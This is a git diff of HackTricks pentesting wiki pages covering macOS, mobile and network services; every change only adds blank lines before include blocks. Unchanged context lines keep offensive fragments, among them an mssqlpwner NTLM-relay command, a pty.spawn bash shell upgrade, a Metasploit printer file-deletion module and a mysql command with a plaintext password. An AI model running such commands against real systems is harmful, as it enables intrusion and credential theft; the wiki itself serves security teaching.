diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md index 961615f30..e7f47a24a 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md @@ -330,6 +330,7 @@ INSERT INTO access ( If you managed to get inside an app with some TCC permissions check the following page with TCC payloads to abuse them: + {{#ref}} macos-tcc-payloads.md {{#endref}} @@ -338,6 +339,7 @@ macos-tcc-payloads.md Learn about Apple Events in: + {{#ref}} macos-apple-events.md {{#endref}} @@ -590,6 +592,7 @@ AllowApplicationsList.plist: ### TCC Bypasses + {{#ref}} macos-tcc-bypasses/ {{#endref}} @@ -604,4 +607,3 @@ macos-tcc-bypasses/ {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md index 8eebb7112..790d4230e 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md @@ -35,6 +35,7 @@ Moreover, it's possible to **remove the legit app from the Dock and put the fake More info and PoC in: + {{#ref}} ../../../macos-privilege-escalation.md {{#endref}} @@ -72,6 +73,7 @@ An app with the **`kTCCServiceAppleEvents`** permission will be able to **contro For more info about Apple Scripts check: + {{#ref}} macos-apple-scripts.md {{#endref}} 
@@ -262,6 +264,7 @@ For more info check the [**original report**](https://www.microsoft.com/en-us/se There are different techniques to inject code inside a process and abuse its TCC privileges: + {{#ref}} ../../../macos-proces-abuse/ {{#endref}} @@ -508,6 +511,7 @@ The folder **`/var/db/locationd/` wasn't protected from DMG mounting** so it was ## By startup apps + {{#ref}} ../../../../macos-auto-start-locations.md {{#endref}} @@ -537,4 +541,3 @@ Another way using [**CoreGraphics events**](https://objectivebythesea.org/v2/tal {{#include ../../../../../banners/hacktricks-training.md}} - diff --git a/src/mobile-pentesting/android-app-pentesting/README.md b/src/mobile-pentesting/android-app-pentesting/README.md index 3188664e1..d70abe26f 100644 --- a/src/mobile-pentesting/android-app-pentesting/README.md +++ b/src/mobile-pentesting/android-app-pentesting/README.md @@ -6,6 +6,7 @@ It's highly recommended to start reading this page to know about the **most important parts related to Android security and the most dangerous components in an Android application**: + {{#ref}} android-applications-basics.md {{#endref}} @@ -54,10 +55,12 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed ## Case Studies & Vulnerabilities + {{#ref}} ../ios-pentesting/air-keyboard-remote-input-injection.md {{#endref}} + {{#ref}} ../../linux-hardening/privilege-escalation/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md {{#endref}} @@ -98,6 +101,7 @@ In effect, it is **blinding the user from knowing they are actually performing a Find more information in: + {{#ref}} tapjacking.md {{#endref}} @@ -108,6 +112,7 @@ An **activity** with the **`launchMode`** set to **`singleTask` without any `tas More info in: + {{#ref}} android-task-hijacking.md {{#endref}} 
@@ -182,6 +187,7 @@ Developers shouldn't use **deprecated algorithms** to perform authorisation **ch Read the following page to learn how to easily access javascript code of React applications: + {{#ref}} react-native-application.md {{#endref}} @@ -190,6 +196,7 @@ react-native-application.md Read the following page to learn how to easily access C# code of a xamarin applications: + {{#ref}} ../xamarin-apps.md {{#endref}} @@ -210,6 +217,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains ### Bypass Biometric Authentication + {{#ref}} bypass-biometric-authentication-android.md {{#endref}} @@ -223,6 +231,7 @@ bypass-biometric-authentication-android.md ### **Other tricks** + {{#ref}} content-protocol.md {{#endref}} @@ -252,6 +261,7 @@ Thanks to the ADB connection you can use **Drozer** and **Frida** inside the emu - [**Android Studio**](https://developer.android.com/studio) (You can create **x86** and **arm** devices, and according to [**this** ](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**latest x86** versions **support ARM libraries** without needing an slow arm emulator). - Learn to set it up in this page: + {{#ref}} avd-android-virtual-device.md {{#endref}} @@ -792,4 +802,3 @@ AndroL4b is an Android security virtual machine based on ubuntu-mate includes th {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md b/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md index 704725b63..8be7f0e87 100644 --- a/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md +++ b/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md @@ -223,6 +223,7 @@ Using [rootAVD](https://github.com/newbit1/rootAVD) with [Magisk](https://github Check the following page to learn how to install a custom CA cert: + {{#ref}} install-burp-certificate.md {{#endref}} 
@@ -238,4 +239,3 @@ You can **use the GUI** to take a snapshot of the VM at any time: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/mobile-pentesting/android-app-pentesting/tapjacking.md b/src/mobile-pentesting/android-app-pentesting/tapjacking.md index ce939a287..8911ed9d3 100644 --- a/src/mobile-pentesting/android-app-pentesting/tapjacking.md +++ b/src/mobile-pentesting/android-app-pentesting/tapjacking.md @@ -107,6 +107,7 @@ wm.addView(phishingView, lp); For additional details on leveraging Accessibility Services for full remote device control (e.g. PlayPraetor, SpyNote, etc.) see: + {{#ref}} accessibility-services-abuse.md {{#endref}} @@ -114,4 +115,4 @@ accessibility-services-abuse.md ## References * [Bitsight – ToxicPanda Android Banking Malware 2025 Study](https://www.bitsight.com/blog/toxicpanda-android-banking-malware-2025-study) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/ios-pentesting/README.md b/src/mobile-pentesting/ios-pentesting/README.md index bc38b67b0..e40b6aa0b 100644 --- a/src/mobile-pentesting/ios-pentesting/README.md +++ b/src/mobile-pentesting/ios-pentesting/README.md @@ -4,6 +4,7 @@ ## iOS Basics + {{#ref}} ios-basics.md {{#endref}} @@ -12,6 +13,7 @@ ios-basics.md In this page you can find information about the **iOS simulator**, **emulators** and **jailbreaking:** + {{#ref}} ios-testing-environment.md {{#endref}} @@ -22,6 +24,7 @@ ios-testing-environment.md During the testing **several operations are going to be suggested** (connect to the device, read/write/upload/download files, use some tools...). Therefore, if you don't know how to perform any of these actions please, **start reading the page**: + {{#ref}} basic-ios-testing-operations.md {{#endref}} 
@@ -158,6 +161,7 @@ $ frida-ps -Uai Learn how to **enumerate the components of the application** and how to easily **hook methods and classes** with objection: + {{#ref}} ios-hooking-with-objection.md {{#endref}} @@ -387,6 +391,7 @@ However, the best options to disassemble the binary are: [**Hopper**](https://ww To learn about how iOS stores data in the device read this page: + {{#ref}} ios-basics.md {{#endref}} @@ -486,6 +491,7 @@ Developers are enabled to **store and sync data** within a **NoSQL cloud-hosted You can find how to check for misconfigured Firebase databases here: + {{#ref}} ../../network-services-pentesting/pentesting-web/buckets/firebase-database.md {{#endref}} @@ -1056,42 +1062,49 @@ frida -U -f com.highaltitudehacks.DVIAswiftv2 --no-pause -l fingerprint-bypass-i ### Custom URI Handlers / Deeplinks / Custom Schemes + {{#ref}} ios-custom-uri-handlers-deeplinks-custom-schemes.md {{#endref}} ### Universal Links + {{#ref}} ios-universal-links.md {{#endref}} ### UIActivity Sharing + {{#ref}} ios-uiactivity-sharing.md {{#endref}} ### UIPasteboard + {{#ref}} ios-uipasteboard.md {{#endref}} ### App Extensions + {{#ref}} ios-app-extensions.md {{#endref}} ### WebViews + {{#ref}} ios-webviews.md {{#endref}} ### Serialisation and Encoding + {{#ref}} ios-serialisation-and-encoding.md {{#endref}} @@ -1101,6 +1114,7 @@ ios-serialisation-and-encoding.md It's important to check that no communication is occurring **without encryption** and also that the application is correctly **validating the TLS certificate** of the server.\ To check these kind of issues you can use a proxy like **Burp**: + {{#ref}} burp-configuration-for-ios.md {{#endref}} @@ -1150,6 +1164,7 @@ otool -L ## Interesting Vulnerabilities & Case Studies + {{#ref}} air-keyboard-remote-input-injection.md {{#endref}} @@ -1185,4 +1200,3 @@ air-keyboard-remote-input-injection.md {{#include ../../banners/hacktricks-training.md}} - 
diff --git a/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md b/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md index ef7cae772..e704e0d6b 100644 --- a/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md +++ b/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md @@ -356,6 +356,7 @@ You can check the crashes in: ## Frida Android Tutorials + {{#ref}} ../android-app-pentesting/frida-tutorial/ {{#endref}} @@ -368,4 +369,3 @@ You can check the crashes in: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md b/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md index b5b049c65..cc059f238 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md +++ b/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md @@ -58,6 +58,7 @@ Corellium is the only publicly available iOS emulator. It is an enterprise SaaS Check this blog post about how to pentest an iOS application in a **non jailbroken device**: + {{#ref}} ios-pentesting-without-jailbreak.md {{#endref}} @@ -104,6 +105,7 @@ Jailbreaking **removes OS-imposed sandboxing**, allowing apps to access the enti ### **After Jailbreaking** + {{#ref}} basic-ios-testing-operations.md {{#endref}} @@ -134,4 +136,3 @@ You can try to avoid this detections using **objection's** `ios jailbreak disabl {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/11211-memcache/README.md b/src/network-services-pentesting/11211-memcache/README.md index 26461905b..2c6c373b0 100644 --- a/src/network-services-pentesting/11211-memcache/README.md +++ b/src/network-services-pentesting/11211-memcache/README.md @@ -183,6 +183,7 @@ memcached itself does not support replication. If you really need it you need to ### Commands Cheat-Sheet + {{#ref}} memcache-commands.md {{#endref}} 
@@ -199,4 +200,3 @@ memcache-commands.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/137-138-139-pentesting-netbios.md b/src/network-services-pentesting/137-138-139-pentesting-netbios.md index d2bedb3dc..43f2bde7a 100644 --- a/src/network-services-pentesting/137-138-139-pentesting-netbios.md +++ b/src/network-services-pentesting/137-138-139-pentesting-netbios.md @@ -53,6 +53,7 @@ PORT STATE SERVICE VERSION **Read the next page to learn how to enumerate this service:** + {{#ref}} 137-138-139-pentesting-netbios.md {{#endref}} @@ -84,4 +85,3 @@ Entry_2: {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/2375-pentesting-docker.md b/src/network-services-pentesting/2375-pentesting-docker.md index 99db0ebee..27bbcd4c1 100644 --- a/src/network-services-pentesting/2375-pentesting-docker.md +++ b/src/network-services-pentesting/2375-pentesting-docker.md @@ -200,6 +200,7 @@ nmap -sV --script "docker-*" -p In the following page you can find ways to **escape from a docker container**: + {{#ref}} ../linux-hardening/privilege-escalation/docker-security/ {{#endref}} @@ -336,4 +337,3 @@ You can use auditd to monitor docker. {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md b/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md index b8710d1a9..2bef9323c 100644 --- a/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md +++ b/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md 
@@ -58,6 +58,7 @@ This technique effectively blocks new devices from registering their services on The most interesting attack you can perform over this service is to perform a **MitM** in the **communication between the client and the real server**. You might be able to obtain sensitive files (MitM the communication with the printer) of even credentials (Windows authentication).\ For more information check: + {{#ref}} ../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md {{#endref}} @@ -69,4 +70,3 @@ For more information check: {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/5439-pentesting-redshift.md b/src/network-services-pentesting/5439-pentesting-redshift.md index a9e1f8cc8..5b66ef2c2 100644 --- a/src/network-services-pentesting/5439-pentesting-redshift.md +++ b/src/network-services-pentesting/5439-pentesting-redshift.md @@ -8,6 +8,7 @@ This port is used by **Redshift** to run. It's basically an AWS variation of **P For more information check: + {{#ref}} https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html {{#endref}} diff --git a/src/network-services-pentesting/5555-android-debug-bridge.md b/src/network-services-pentesting/5555-android-debug-bridge.md index 0f385fd69..89dcb61be 100644 --- a/src/network-services-pentesting/5555-android-debug-bridge.md +++ b/src/network-services-pentesting/5555-android-debug-bridge.md @@ -35,6 +35,7 @@ adb root || true # Works on eng/userdebug/insecure builds, many em For a general ADB command reference, see: + {{#ref}} ../mobile-pentesting/android-app-pentesting/adb-commands.md {{#endref}} diff --git a/src/network-services-pentesting/8089-splunkd.md b/src/network-services-pentesting/8089-splunkd.md index 182382fb8..7eeadcc64 100644 --- a/src/network-services-pentesting/8089-splunkd.md +++ b/src/network-services-pentesting/8089-splunkd.md 
@@ -113,6 +113,7 @@ pty.spawn('/bin/bash') In the following page you can find an explanation how this service can be abused to escalate privileges and obtain persistence: + {{#ref}} ../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md {{#endref}} @@ -124,4 +125,3 @@ In the following page you can find an explanation how this service can be abused {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/9000-pentesting-fastcgi.md b/src/network-services-pentesting/9000-pentesting-fastcgi.md index 0018e3a7e..7b73e2d7e 100644 --- a/src/network-services-pentesting/9000-pentesting-fastcgi.md +++ b/src/network-services-pentesting/9000-pentesting-fastcgi.md @@ -6,6 +6,7 @@ If you want to **learn what is FastCGI** check the following page: + {{#ref}} pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md {{#endref}} @@ -41,4 +42,3 @@ or you can also use the following python script: [https://gist.github.com/phith0 {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/9100-pjl.md b/src/network-services-pentesting/9100-pjl.md index e060528da..522bca080 100644 --- a/src/network-services-pentesting/9100-pjl.md +++ b/src/network-services-pentesting/9100-pjl.md @@ -56,6 +56,7 @@ msf> use auxiliary/scanner/printer/printer_delete_file This is the tool you want to use to abuse printers: + {{#ref}} https://github.com/RUB-NDS/PRET {{#endref}} diff --git a/src/network-services-pentesting/9200-pentesting-elasticsearch.md b/src/network-services-pentesting/9200-pentesting-elasticsearch.md index 16d33e635..5b08e4868 100644 --- a/src/network-services-pentesting/9200-pentesting-elasticsearch.md +++ b/src/network-services-pentesting/9200-pentesting-elasticsearch.md 
@@ -175,6 +175,7 @@ Some tools will obtain some of the data presented before: msf > use auxiliary/scanner/elasticsearch/indices_enum ``` + {{#ref}} https://github.com/theMiddleBlue/nmap-elasticsearch-nse {{#endref}} diff --git a/src/network-services-pentesting/nfs-service-pentesting.md b/src/network-services-pentesting/nfs-service-pentesting.md index 2834d8fd6..d1a36ba42 100644 --- a/src/network-services-pentesting/nfs-service-pentesting.md +++ b/src/network-services-pentesting/nfs-service-pentesting.md @@ -124,6 +124,7 @@ Ofc, the only problem here is that by default it's not possible to impersonate r Check the page: + {{#ref}} ../linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md {{#endref}} @@ -201,4 +202,3 @@ Entry_2: {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md index 1a4769092..f69776829 100644 --- a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md +++ b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md @@ -6,6 +6,7 @@ ## Default passwords + {{#ref}} http://www.vulnerabilityassessment.co.uk/passwordsC.htm {{#endref}} diff --git a/src/network-services-pentesting/pentesting-kerberos-88/README.md b/src/network-services-pentesting/pentesting-kerberos-88/README.md index 7c6bc8467..225ab1c99 100644 --- a/src/network-services-pentesting/pentesting-kerberos-88/README.md +++ b/src/network-services-pentesting/pentesting-kerberos-88/README.md 
@@ -29,6 +29,7 @@ PORT STATE SERVICE The MS14-068 flaw permits an attacker to tamper with a legitimate user's Kerberos login token to falsely claim elevated privileges, such as being a Domain Admin. This counterfeit claim is mistakenly validated by the Domain Controller, enabling unauthorized access to network resources across the Active Directory forest. + {{#ref}} https://adsecurity.org/?p=541 {{#endref}} diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index 00624998b..011ecefaf 100644 --- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -141,6 +141,7 @@ use_link [NAME] #### Get User + {{#ref}} types-of-mssql-users.md {{#endref}} @@ -300,6 +301,7 @@ mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.25 Using tools such as **responder** or **Inveigh** it's possible to **steal the NetNTLM hash**.\ You can see how to use these tools in: + {{#ref}} ../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md {{#endref}} @@ -308,6 +310,7 @@ You can see how to use these tools in: [**Read this post**](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **to find more information about how to abuse this feature:** + {{#ref}} ../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md {{#endref}} 
@@ -612,10 +615,12 @@ For further information, refer to the following links regarding this attack: [De The user running MSSQL server will have enabled the privilege token **SeImpersonatePrivilege.**\ You probably will be able to **escalate to Administrator** following one of these 2 paged: + {{#ref}} ../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md {{#endref}} + {{#ref}} ../../windows-hardening/windows-local-privilege-escalation/juicypotato.md {{#endref}} @@ -696,4 +701,3 @@ Entry_3: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-mysql.md b/src/network-services-pentesting/pentesting-mysql.md index ec565c39f..25723f9ad 100644 --- a/src/network-services-pentesting/pentesting-mysql.md +++ b/src/network-services-pentesting/pentesting-mysql.md @@ -119,6 +119,7 @@ You can see in the docs the meaning of each privilege: [https://dev.mysql.com/do ### MySQL File RCE + {{#ref}} ../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md {{#endref}} @@ -754,4 +755,3 @@ john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist - [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/) {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-postgresql.md b/src/network-services-pentesting/pentesting-postgresql.md index e6b8bbacc..3d3733467 100644 --- a/src/network-services-pentesting/pentesting-postgresql.md +++ b/src/network-services-pentesting/pentesting-postgresql.md @@ -60,6 +60,7 @@ SELECT * FROM pg_extension; For more information about **how to abuse a PostgreSQL database** check: + {{#ref}} ../pentesting-web/sql-injection/postgresql-injection/ {{#endref}} 
@@ -303,6 +304,7 @@ A very important limitation of this technique is that **`copy` cannot be used to However, there are **other techniques to upload big binary files:** + {{#ref}} ../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md {{#endref}} @@ -423,6 +425,7 @@ More information about this vulnerability [**here**](https://medium.com/greenwol ### RCE with PostgreSQL Languages + {{#ref}} ../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md {{#endref}} @@ -431,6 +434,7 @@ More information about this vulnerability [**here**](https://medium.com/greenwol Once you have **learned** from the previous post **how to upload binary files** you could try obtain **RCE uploading a postgresql extension and loading it**. + {{#ref}} ../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md {{#endref}} @@ -734,6 +738,7 @@ And then **execute commands**: **PL/pgSQL** is a **fully featured programming language** that offers greater procedural control compared to SQL. It enables the use of **loops** and other **control structures** to enhance program logic. In addition, **SQL statements** and **triggers** have the capability to invoke functions that are created using the **PL/pgSQL language**. This integration allows for a more comprehensive and versatile approach to database programming and automation.\ **You can abuse this language in order to ask PostgreSQL to brute-force the users credentials.** + {{#ref}} ../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md {{#endref}} @@ -806,4 +811,3 @@ The available password-based authentication methods in pg_hba.conf are **md5**, - diff --git a/src/network-services-pentesting/pentesting-rdp.md b/src/network-services-pentesting/pentesting-rdp.md index 62dd4bcb9..0c5055480 100644 --- a/src/network-services-pentesting/pentesting-rdp.md +++ b/src/network-services-pentesting/pentesting-rdp.md 
@@ -100,6 +100,7 @@ You can search RDPs that have been backdoored with one of these techniques alrea If someone from a different domain or with **better privileges login via RDP** to the PC where **you are an Admin**, you can **inject** your beacon in his **RDP session process** and act as him: + {{#ref}} ../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md {{#endref}} @@ -152,4 +153,3 @@ Entry_2: {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-smb/README.md b/src/network-services-pentesting/pentesting-smb/README.md index 12392ad0a..b7de7067f 100644 --- a/src/network-services-pentesting/pentesting-smb/README.md +++ b/src/network-services-pentesting/pentesting-smb/README.md @@ -48,6 +48,7 @@ The above command is an example of how `enum4linux` might be used to perform a f If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very interesting this page about **NTLM** where is explained **how this protocol works and how you can take advantage of it:** + {{#ref}} ../../windows-hardening/ntlm/ {{#endref}} @@ -173,6 +174,7 @@ run ### **Enumerating LSARPC and SAMR rpcclient** + {{#ref}} rpcclient-enumeration.md {{#endref}} @@ -591,4 +593,3 @@ Entry_6: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-smtp/README.md b/src/network-services-pentesting/pentesting-smtp/README.md index 76a33d55b..a814eaccf 100644 --- a/src/network-services-pentesting/pentesting-smtp/README.md +++ b/src/network-services-pentesting/pentesting-smtp/README.md @@ -248,6 +248,7 @@ print("[***]successfully sent email to %s:" % (msg['To'])) SMTP Smuggling vulnerability allowed to bypass all the SMTP protections (check the next section for more info about protections). For more info on SMTP Smuggling check: + {{#ref}} smtp-smuggling.md {{#endref}} @@ -607,4 +608,3 @@ Entry_8: {{#include ../../banners/hacktricks-training.md}} - 
diff --git a/src/network-services-pentesting/pentesting-snmp/README.md b/src/network-services-pentesting/pentesting-snmp/README.md index 10c780382..0d8002b3b 100644 --- a/src/network-services-pentesting/pentesting-snmp/README.md +++ b/src/network-services-pentesting/pentesting-snmp/README.md @@ -168,6 +168,7 @@ A series of **Management Information Base (MIB) values** are utilized to monitor Take a look to this page if you are Cisco equipment: + {{#ref}} cisco-snmp.md {{#endref}} @@ -176,6 +177,7 @@ cisco-snmp.md If you have the **string** that allows you to **write values** inside the SNMP service, you may be able to abuse it to **execute commands**: + {{#ref}} snmp-rce.md {{#endref}} @@ -284,4 +286,3 @@ Entry_5: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-ssh.md b/src/network-services-pentesting/pentesting-ssh.md index fba9d33cd..59376ff8b 100644 --- a/src/network-services-pentesting/pentesting-ssh.md +++ b/src/network-services-pentesting/pentesting-ssh.md @@ -133,6 +133,7 @@ Or use `ssh-keybrute.py` (native python3, lightweight and has legacy algorithms #### Known badkeys can be found here: + {{#ref}} https://github.com/rapid7/ssh-badkeys/tree/master/authorized {{#endref}} diff --git a/src/network-services-pentesting/pentesting-voip/README.md b/src/network-services-pentesting/pentesting-voip/README.md index c0d48cd04..33cf3efc4 100644 --- a/src/network-services-pentesting/pentesting-voip/README.md +++ b/src/network-services-pentesting/pentesting-voip/README.md @@ -7,6 +7,7 @@ To start learning about how VoIP works check: + {{#ref}} basic-voip-protocols/ {{#endref}} @@ -698,4 +699,3 @@ The easiest way to install a software such as Asterisk is to download an **OS di {{#include ../../banners/hacktricks-training.md}} - 
diff --git a/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md b/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md index 274880d22..f5bdb8a19 100644 --- a/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md +++ b/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md @@ -8,6 +8,7 @@ This is the industry standard, for more information check: + {{#ref}} sip-session-initiation-protocol.md {{#endref}} @@ -97,4 +98,3 @@ These protocols play essential roles in **delivering and securing real-time mult {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-web/README.md b/src/network-services-pentesting/pentesting-web/README.md index fee20465f..41291959b 100644 --- a/src/network-services-pentesting/pentesting-web/README.md +++ b/src/network-services-pentesting/pentesting-web/README.md @@ -21,6 +21,7 @@ openssl s_client -connect domain.com:443 # GET / HTTP/1.0 ### Web API Guidance + {{#ref}} web-api-pentesting.md {{#endref}} @@ -117,6 +118,7 @@ If the **source code** of the application is available in **github**, apart of p - Can you **access any of these files** exploiting some vulnerability? - Is there any **interesting information in the github** (solved and not solved) **issues**? Or in **commit history** (maybe some **password introduced inside an old commit**)? + {{#ref}} code-review-tools.md {{#endref}} @@ -313,6 +315,7 @@ _Note that anytime a new directory is discovered during brute-forcing or spideri **403 Forbidden/Basic Authentication/401 Unauthorized (bypass)** + {{#ref}} 403-and-401-bypasses.md {{#endref}} 
@@ -335,6 +338,7 @@ It is possible to **put content** inside a **Redirection**. This content **won't Now that a comprehensive enumeration of the web application has been performed it's time to check for a lot of possible vulnerabilities. You can find the checklist here: + {{#ref}} ../../pentesting-web/web-vulnerabilities-methodology.md {{#endref}} @@ -424,4 +428,3 @@ Entry_12: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-web/buckets/README.md b/src/network-services-pentesting/pentesting-web/buckets/README.md index 9ed6844e1..854a43692 100644 --- a/src/network-services-pentesting/pentesting-web/buckets/README.md +++ b/src/network-services-pentesting/pentesting-web/buckets/README.md @@ -4,6 +4,7 @@ Check this page if you want to learn more about enumerating and abusing Buckets: + {{#ref}} https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#aws---s3-unauthenticated-enum {{#endref}} diff --git a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md index ae9df2254..533695bc4 100644 --- a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md +++ b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md @@ -8,6 +8,7 @@ Firebase is a Backend-as-a-Services mainly for mobile application. It is focused Learn more about Firebase in: + {{#ref}} https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html {{#endref}} diff --git a/src/network-services-pentesting/pentesting-web/drupal/README.md b/src/network-services-pentesting/pentesting-web/drupal/README.md index c811437de..be4b7ca85 100644 --- a/src/network-services-pentesting/pentesting-web/drupal/README.md +++ b/src/network-services-pentesting/pentesting-web/drupal/README.md 
@@ -72,6 +72,7 @@ droopescan scan drupal -u http://drupal-site.local If you have access to the Drupal web console check these options to get RCE: + {{#ref}} drupal-rce.md {{#endref}} @@ -100,4 +101,3 @@ mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md index 0c2e4afef..59236ba8f 100644 --- a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md +++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md @@ -117,6 +117,7 @@ Modify the start-main configuration and add the use of a proxy such as: If you can execute locally an Electron App it's possible that you could make it execute arbitrary javascript code. Check how in: + {{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md {{#endref}} @@ -181,14 +182,17 @@ If the contexts aren't isolated an attacker can: There are 2 places where built-int methods can be overwritten: In preload code or in Electron internal code: + {{#ref}} electron-contextisolation-rce-via-preload-code.md {{#endref}} + {{#ref}} electron-contextisolation-rce-via-electron-internal-code.md {{#endref}} + {{#ref}} electron-contextisolation-rce-via-ipc.md {{#endref}} @@ -433,6 +437,7 @@ It's usually **configured** in the **`main.js`** file or in the **`index.html`** For more information check: + {{#ref}} pentesting-web/content-security-policy-csp-bypass/ {{#endref}} @@ -488,4 +493,3 @@ npm start {{#include ../../../banners/hacktricks-training.md}} - 
